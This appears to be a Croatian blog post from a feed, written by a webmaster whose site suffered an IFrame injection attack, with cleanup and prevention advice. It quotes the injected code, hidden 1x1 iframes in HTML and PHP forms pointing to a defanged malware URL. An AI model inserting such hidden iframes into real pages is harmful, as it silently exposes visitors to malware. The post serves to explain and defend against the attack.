svebee » iframe http://www.svebee.com Something about everything... Sun, 20 Mar 2011 09:44:29 +0000 en hourly 1 http://wordpress.org/?v=3.1 IFrame injection http://www.svebee.com/824/iframe-injection http://www.svebee.com/824/iframe-injection#comments Fri, 14 Aug 2009 13:41:19 +0000 svebee http://www.svebee.com/?p=824 IFrame je skraćenica od inline-frame. Radi se o HTML elementu. Prvenstveno služi za jednostavno ubacivanje jedne (HTML) stranice u drugu, ili pak određenih objekata. Vrlo koristan element, te ima širok spektar mogućnosti. No, kao i kod većine stvari, uloga mu može biti dobra ili loša. IFrame napadi se služe iframe elementom za ubacivanje u pojedine stranice. Takvi napadi pogađaju sve index.* (* – bilo koja ekstenzija) stranice na serveru – index.html, index.php, index.xhtml i tako redom. Iako moram primijetiti, da su kod jučerašnjeg napada (zbog kojih je stranica bila nedostupna) i par ostalih stranica s imenom “default” umjesto “index” bile zaražene malicioznim kodom. Kao što sam napisao, pogađa sve ekstenzije te im se prilagođava.

Tako npr. za .html stranice ubacuje kod tipa

<iframe src=”http://goooogleadsence_ne_klikaj.biz/?click=8F9DA” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

dok za .php stranice ubacuje

echo<iframe src=\”http://goooogleadsence_ne_klikaj.biz/?click=8F9DA\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;

NAPOMENA: URL (link) je editiran, dodano je ne_klikaj iz razloga da (po)neki korisnici nebi otišli na navedene linkove i zarazili se malicioznim kodom.

Na koji način može dospijeti na vaše stranice? Postoje dva načina – preko zaraženog servera ili češće, preko korisničkog FTP klijenta (računala). U prvom slučaju server ima određene sigurnosne rupe te ukoliko se nađe zaražen, sve stranice na njemu bivaju zaražene (problematičnija stvar). U drugom slučaju, webmasterovo/administratorsko računalo je zaraženo – tada je pogođena samo njegova stranica tj. stranice kojima ima pristup preko FTP protokola. Kada utipkate korisničko ime (username) i lozinku (password) kako bi pristupili svojoj stranici, crv to pokupi te se bez vašeg znanja spoji na server i ubacuje što, kako i gdje želi. To naravno nitko ne želi, stoga backup glavu čuva. Osobno, moja stranica je dva puta bila zaražena iframemo, prvi put je samo dodala svoj dio koda na kraj svake index datoteke, no sada je to učinila i na ponekim default datotekama te izbrisala zadnji dio svake datoteke. Ukoliko se nađete u prvoj situaciji, backup i nije nužan, moći ćete ručno sve (p)obirisati, no ukoliko se radi o drugom slučaju morat ćete potražiti eventualno backup hosting tvrtke koja drži server, ili nekako sami to (po)krpati što nikako neće biti jednostavno.

Kada shvatite da su vam stranice zaražene iframeom, prvo proskenirajte računalo s nekim od antivirusnih programa (preporučam besplatan Avast!) te uklonite izvor crva. Nakon toga promijenite FTP šifru s kojom ste pristupali stranici. Obavijestite hosting o napadu kako se isti nebi proširio na ostale stranice. Promijenite dozvole (permissions), postavite na maximal security. Nakon toga skinite sve index.* datoteke te ih čistite jednu po jednu, ručno - jer drugog načina nema (tj. ima, pomoću određenih skripti, no tada izlažete stranicu mogućim problemima, da skripta izbriše nešto što ne bi trebala). Ukoliko imate stvarno veliku količinu index.* datoteka, postoji PHP skripta autora Niyaz PK koju možete uplodatati u root direktorij stranice (naravno prije toga promijenite ekstenziju u .php) te joj pristupite sa

http://www.vasadomena.com/clean.php?s=index.php&c=iframe

Slovo s označuje search (traži) tj. koje datoteke treba pretražiti, a c označuje tekst koji treba pretražiti (u našem slučaju iframe). Izlistat će vam popis svih index.* stranica sa zadanim uvjetima. Skripta neće automatski (o)čistiti datoteke, to morate napraviti sami – ručno.

]]> http://www.svebee.com/824/iframe-injection/feed 0